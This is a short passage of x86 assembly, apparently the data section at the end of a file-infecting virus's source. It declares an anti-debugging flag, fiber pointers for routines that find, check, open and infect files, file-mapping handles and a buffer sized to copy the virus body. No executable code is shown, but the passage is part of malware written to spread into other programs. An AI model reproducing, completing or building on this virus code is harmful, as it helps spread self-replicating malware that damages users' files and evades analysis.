|
|||
|
ddIsDebuggerPresent dd ?
|
|||
|
|
|||
|
dwThreadID dd ?
|
|||
|
|
|||
|
Fiber_Addresses:
|
|||
|
pfMain dd ?
|
|||
|
pfNeuron_Main dd ?
|
|||
|
pfNeuron_Debugger dd ?
|
|||
|
pfNeuron_FindFile dd ?
|
|||
|
pfNeuron_CheckFile dd ?
|
|||
|
pfNeuron_OpenFile dd ?
|
|||
|
pfNeuron_CloseFile dd ?
|
|||
|
pfNeuron_InfectFile dd ?
|
|||
|
|
|||
|
hFile dd ?
|
|||
|
hMapFile dd ?
|
|||
|
lpFile dd ?
|
|||
|
|
|||
|
SearchHandle dd ?
|
|||
|
CurDir db MAX_PATH dup (?)
|
|||
|
WFD WIN32_FIND_DATA ?
|
|||
|
buffer db virus_end - Start + 1 dup (?)
|
|||
|
|
|||
|
virtual_end:
|
|||
|
|
|||
|
_GetModuleHandleA dd offset GetModuleHandleA
|
|||
|
_GetModuleHandleW dd offset GetModuleHandleW
|
|||
|
|
|||
|
ends
|
|||
|
End Start
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|